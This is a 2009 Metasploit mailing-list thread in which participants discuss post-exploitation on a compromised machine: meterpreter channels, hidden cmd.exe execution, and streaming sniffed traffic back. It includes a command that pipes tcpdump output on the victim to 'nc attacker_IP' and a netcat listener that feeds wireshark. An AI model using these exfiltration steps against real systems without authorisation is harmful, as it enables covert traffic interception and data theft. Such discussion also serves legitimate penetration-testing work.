Hi again Anastacios, Quick question... is there anything in the Metasploit Rex library that would allow me to start up a listener similar to netcat directly in Metasploit? This way, I could receive the results of my remote sniffing directly in my program and analyze it in real time...
Also, I've figured out how to access the channel created for an executed process. Do you know of any way I could pipe output from a command I execute on the compromised machine to the channel? For example, if I run tcpdump on the compromised host, I can read the output of the command via the channel. However, this output is not in pcap format. In order to get it in pcap format, I have to use the '-w' option to write it to a file in pcap format. I can tell '-w' to write the data in pcap format to stdin using '-' as the value for '-w', then pipe stdin to something like netcat. In turn, I'd like to be able to either pipe the data to the channel, or pipe it to netcat and hopefully use something in the Rex library to receive the pcap data... What do you think? -- Thanks! Bryan 2009/2/9 Anastasios Monachos <anastasi...@gmail.com> 2009/2/9 Bryan Richardson <btri...@gmail.com> > >> Thanks Anastasios, >> >> So, am I correct in assuming this is how one is dumped into a Windows >> shell after executing an exploit on a vulnerable Windows machine? >> > > Bryan, if I am following you correctly, yes, using the download command > supplied by meterpreter payload you can get a file from victim's machine to > your machine. Note that in the case of windows you will have to escape the \ > with an extra \ when(if) specifying the full path of the file's source and > destination, obviously if you do "download file.txt file.txt" it will try to > get the file from victim's current directory and save it to your current > directory. > > >> I was hoping that I could 'channelize' a traffic sniffer such that the >> sniffed traffic would be sent back to me in real time for real time >> analysis... it doesn't seem like this is the case. >> > > I agree, real-time traffic in some environments really helps the whole task > > > Ultimately, what would be cool is to have my real-time traffic analysis >> software listening on a particular port and have some way of sending the >> sniffed traffic from the compromised machine to that particular port on my >> local machine. >> > > I think it worths trying piping your live data through nc as we do with dd, > but I am not sure if it will work in your case, oh you will have to let your > nc traffic pass the firewall. > > For example: > On victim you can try something like: tcpdump -e host victim_ip and port 23 > | nc attacker_IP attacker_listening_port > On attacker: nc -l -p attacker_listening_port | wireshark -i - > Taken from wireshark's man > " .... Pipe names should be either the name of a FIFO (named > pipe) or > ''-'' to read data from the standard input. Data read from > pipes > must be in standard libpcap format...." > > Last you may also play with the channel read/write options, so to pass nc's > traffic through the channel (?), maybe someone else can reach more light > here > > Let us know what worked and what didnt anyway > > Tasos > > >> -- >> Bryan >> >> On Mon, Feb 9, 2009 at 2:26 PM, Anastasios Monachos < >> anastasi...@gmail.com> wrote: >> >>> 2009/2/9 Bryan Richardson <btri...@gmail.com> >>> >>> Hello All, >>>> >>>> Would someone mind explaining to me what 'channelized' is and how it >>>> works? >>>> >>> >>> You can use "channelisation" in cases where you wish to work with >>> multiple communication channels that will be tunnelled through one tcp/ip >>> session. >>> >>> Channels are supported by the meterpreter payload, and to channelise you >>> can do: >>> >>> meterpreter > execute -f cmd.exe -H -c //this will execute the file >>> cmd.exe, it will hide the process window and it will channelise the task >>> >>> Process 1234 created. //this is output from meterpreter >>> >>> Channel 2 created.//this is output from meterpreter >>> >>> meterpreter > //now use meterpreter as usual to do your other stuff >>> >>> meterpreter > interact 2 //now interact with channelised cmd.exe >>> >>> >>>> >>>> I'm wanting to try and use it to send sniffed traffic back to me from a >>>> compromised machine that I upload a traffic sniffer to... >>>> >>> >>> For already saved captured data you could use the upload/download >>> commands (again from within meterpreter) >>> >>>> >>>> -- >>>> Thanks! >>>> Bryan >>>> >>>> _______________________________________________ >>>> Framework-Hackers mailing list >>>> Framework-Hackers@spool.metasploit.com >>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers >>>> >>>> >>> >>> -- >>> AM >>> >> >> > > > -- > AM > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers > >
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
